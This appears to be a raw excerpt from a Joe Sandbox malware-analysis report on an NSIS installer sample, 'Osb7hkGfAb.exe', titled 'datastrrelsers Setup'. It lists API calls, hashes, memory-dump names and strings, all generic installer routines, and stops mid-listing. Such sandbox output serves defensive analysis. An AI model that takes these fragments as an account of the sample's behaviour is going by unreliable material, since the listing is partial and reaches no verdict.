• Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
• Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
• Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
APIs
• DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectA.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextA.USER32(00000000,datastrrelsers Setup,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F$datastrrelsers Setup
• API String ID: 941294808-580256567
• Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
• Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
• Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
• Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
APIs
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
• GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405DA0
  • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
  • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
• GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405DBD
• wsprintfA.USER32 ref: 00405DDB
• GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
• SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
• GlobalFree.KERNEL32(00000000), ref: 00405EC4
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
  • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405C94
  • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
Strings
                                                                          Similarity
                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                          • String ID: %s=%s$[Rename]
                                                                          • API String ID: 2171350718-1727408572
                                                                          • Opcode ID: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                                          • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                                          • Opcode Fuzzy Hash: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                                          • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                                          APIs
                                                                          • GlobalFree.KERNEL32(00000000), ref: 700E2447
                                                                            • Part of subcall function 700E1224: lstrcpynA.KERNEL32(00000000,?,700E12CF,-700E404B,700E11AB,-000000A0), ref: 700E1234
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 700E23C2
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 700E23D7
                                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 700E23E8
                                                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 700E23F6
                                                                          • GlobalFree.KERNEL32(00000000), ref: 700E23FD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2805650198.00000000700E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 700E0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2805623249.00000000700E0000.00000002.00000001.01000000.00000005.sdmp
                                                                          • Associated: 00000000.00000002.2805669903.00000000700E3000.00000002.00000001.01000000.00000005.sdmp
                                                                          • Associated: 00000000.00000002.2805690432.00000000700E5000.00000002.00000001.01000000.00000005.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_700e0000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                          • String ID: @H1v
                                                                          • API String ID: 3730416702-3152185570
                                                                          APIs
                                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Osb7hkGfAb.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                          • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\Osb7hkGfAb.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                          • CharPrevA.USER32(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                                          • *?|<>/":, xrefs: 0040641A
                                                                          • "C:\Users\user\Desktop\Osb7hkGfAb.exe", xrefs: 0040640E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Char$Next$Prev
                                                                          • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 589700163-2197625893
                                                                          APIs
                                                                          • GetWindowLongA.USER32(?,000000EB), ref: 004041FF
                                                                          • GetSysColor.USER32(00000000), ref: 0040423D
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00404249
                                                                          • SetBkMode.GDI32(?,?), ref: 00404255
                                                                          • GetSysColor.USER32(?), ref: 00404268
                                                                          • SetBkColor.GDI32(?,?), ref: 00404278
                                                                          • DeleteObject.GDI32(?), ref: 00404292
                                                                          • CreateBrushIndirect.GDI32(?), ref: 0040429C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                          • String ID:
                                                                          • API String ID: 2320649405-0
                                                                          APIs
                                                                            • Part of subcall function 700E1215: GlobalAlloc.KERNEL32(00000040,700E1233,?,700E12CF,-700E404B,700E11AB,-000000A0), ref: 700E121D
                                                                          • GlobalFree.KERNEL32(?), ref: 700E25DE
                                                                          • GlobalFree.KERNEL32(00000000), ref: 700E2618
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2805650198.00000000700E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 700E0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2805623249.00000000700E0000.00000002.00000001.01000000.00000005.sdmp
                                                                          • Associated: 00000000.00000002.2805669903.00000000700E3000.00000002.00000001.01000000.00000005.sdmp
                                                                          • Associated: 00000000.00000002.2805690432.00000000700E5000.00000002.00000001.01000000.00000005.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_700e0000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$Alloc
                                                                          • String ID:
                                                                          • API String ID: 1780285237-0
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(0042A070,00000000,00424248,774D23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                          • lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,774D23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                          • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,774D23A0), ref: 0040527A
                                                                          • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                          • String ID:
                                                                          • API String ID: 2531174081-0
                                                                          APIs
                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                                          • GetMessagePos.USER32 ref: 00404AF1
                                                                          • ScreenToClient.USER32(?,?), ref: 00404B0B
                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Send$ClientScreen
                                                                          • String ID: f
                                                                          • API String ID: 41195575-1993550816
                                                                          APIs
                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                          • MulDiv.KERNEL32(000D7516,00000064,000D8A80), ref: 00402E00
                                                                          • wsprintfA.USER32 ref: 00402E10
                                                                          • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                                                          Strings
                                                                          • verifying installer: %d%%, xrefs: 00402E0A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                          • String ID: verifying installer: %d%%
                                                                          • API String ID: 1451636040-82062127
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2805650198.00000000700E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 700E0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2805623249.00000000700E0000.00000002.00000001.01000000.00000005.sdmp
                                                                          • Associated: 00000000.00000002.2805669903.00000000700E3000.00000002.00000001.01000000.00000005.sdmp
                                                                          • Associated: 00000000.00000002.2805690432.00000000700E5000.00000002.00000001.01000000.00000005.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_700e0000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: FreeGlobal
                                                                          • String ID:
                                                                          • API String ID: 2979337801-0
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                                          • GetClientRect.USER32(?,?), ref: 00401DCC
                                                                          • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                                          • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                                          • DeleteObject.GDI32(00000000), ref: 00401E20
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                          • String ID:
                                                                          • API String ID: 1849352358-0
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                          • wsprintfA.USER32 ref: 00404A6A
                                                                          • SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                          • String ID: %u.%u%s%s
                                                                          • API String ID: 3540041739-3551169577
                                                                          • Opcode ID: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                                          • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                                          • Opcode Fuzzy Hash: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                                          • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                                          • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 2659869361-2145255484
                                                                          • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                          • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                                          • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                          • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                                          APIs
                                                                          • DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
                                                                          • GetTickCount.KERNEL32 ref: 00402E6E
                                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                          • String ID:
                                                                          • API String ID: 2102729457-0
                                                                          • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                          • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                                          • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                          • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                                          APIs
                                                                            • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,datastrrelsers Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                            • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                          • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                                          • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,774D3410,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 3248276644-2145255484
                                                                          • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                          • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                                          • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                          • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 004051C1
                                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00405212
                                                                            • Part of subcall function 004041C7: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
